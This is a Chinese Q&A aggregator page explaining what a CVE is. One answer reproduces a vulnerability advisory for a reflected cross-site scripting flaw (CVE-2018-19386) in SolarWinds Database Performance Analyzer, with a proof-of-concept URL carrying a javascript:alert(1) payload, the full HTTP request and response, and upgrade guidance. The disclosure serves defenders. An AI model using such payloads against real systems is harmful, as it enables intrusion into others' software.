问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

网络中的CVE是什么?

发布网友 发布时间:2022-05-02 19:01

我来回答

2个回答

懂视网 时间:2022-05-02 23:23

漏洞

在SolarWinds的11.1.457版中,“idcStateError.iwc”错误页面中存在Reflected Cross-Site Scripting漏洞,已经在版本12.1中修复。低于11.1.457的版本还可能存在这个漏洞,

具体细节

以下HTTP请求和响应显示了如何触发问题以及结果:

http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f

请求:

GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1
Host: 172.16.4.104:8123
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.4.104:8123/iwc/login.iwc
Cookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9

回显:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 19 Nov 2018 18:46:00 GMT
Connection: close
Content-Length: 6531

[...]
<a href="javascript:alert(1)//" class="btn btn-primary">
[...]

技术图片

图1:跨站点脚本(XSS)导致的弹框

修复

SolarWinds数据库性能分析器的用户应升级到12.1版可修复此问题。

有关详细信息,请参阅公告:

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23916

参考

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve201819386-reflected-xss-in-solarwinds-database-performance-analyzer/

CVE-2018-19386:SolarWinds数据库性能分析器中反射的XSS

标签:security   pac   image   分析器   apach   http   session   wave   expires   

热心网友 时间:2022-05-02 20:31

CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具*享数据,虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题。 CVE的特点: - 为每个漏洞和暴露确定了唯一的名称 - 给每个漏洞和暴露一个标准化的描述 - 不是一个数据库,而是一个字典 - 任何完全迥异的漏洞库都可以用同一个语言表述 - 由于语言统一,可以使得安全事件报告更好地被理解,实现更好的协同工作 - 可以成为评价相应工具和数据库的基准 - 非常容易从互联网查询和下载 - 通过“CVE编辑部”体现业界的认可
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
中美有什么经济冲突 杨凌衡水实验中学高中学费是多少 蒂芙尼珍珠项链怎么清洗和保养? tiffany&amp;co 的缺点 如何保养蒂芙尼的项链? tiffany保养要多久时间 Tiffany珠宝需要多长时间保养? 人为什么活着,怎样活着都是无憾!! 孩子犟的不行家长怎么教育 有什么比较好用的游戏视频录制软件? 适用于Windows的10个好用的游戏录制软件 应收账款融资后,应收账款会计科目会减少吗 资产负债表中应收账款和应收票据项目与应收款项融资项目有什么? 应收款项融资属于什么科目? 我持有的原始股,10年了,没上市,可以参与公司的分红吗? 斗棋游戏怎样删除别人的亲友圈 移动亲友圈业务怎样短信取消? 三晋娱乐麻将怎么退出亲友圈 自建亲友圈怎么退出? 怎么退出别人的亲友圈 对战互娱怎么退出亲友圈 情怀棋牌怎么退出亲友圈 美的凡帝罗BCD-276UEM 不制冷怎么办 湖南自考汉语言文学本科要考那几门。到那里查 湖南师范大学长线自考的汉语言文学专业难过吗? 湖南师范大学汉语言文学自考本科如果还有两门没过,能不能报考毕业论文 如果我去湖南师范大学自考汉语言文学,以后想从事教师工作是不是还要考相关证书 现在报考湖南师范大学的汉语言文学自考要考多少门? 湖南师范大学自考都有哪些专业 关于湖南师范大学长线自考 汉语言文学 nove6 se 如何设置type-c耳机模式? 白底照片能干什么除了驾驶证 记中国历史朝代的口决,最好是顺口的! 手机锁屏了忘记密码,什么方法可以解锁!手机是三星的 手机锁屏了密码忘了有谁知道怎么做可以解锁 手机忘记密码了这么样长可以解锁 是安做机 美团头像怎么设置与换 美团头像经常换菜品头像怎么回事? 日利率最高的理财产品 如何注销 从此都不用 贵州高级工程师答辩通过率 山西省评工程高级职称通过率 不用了怎么注销 人事厅评审高级难吗 怎样注销账号 江西水利高级职称评审通过率是多少? 可以注销吗?怎么注销? 安徽省2015年工程系列正高级职称评审通过率是多少 有没有懂微信呢 可以联系我 我想注销 但有app 绑定 实在注销不了 如何注销和手机的绑定 怎么快速注销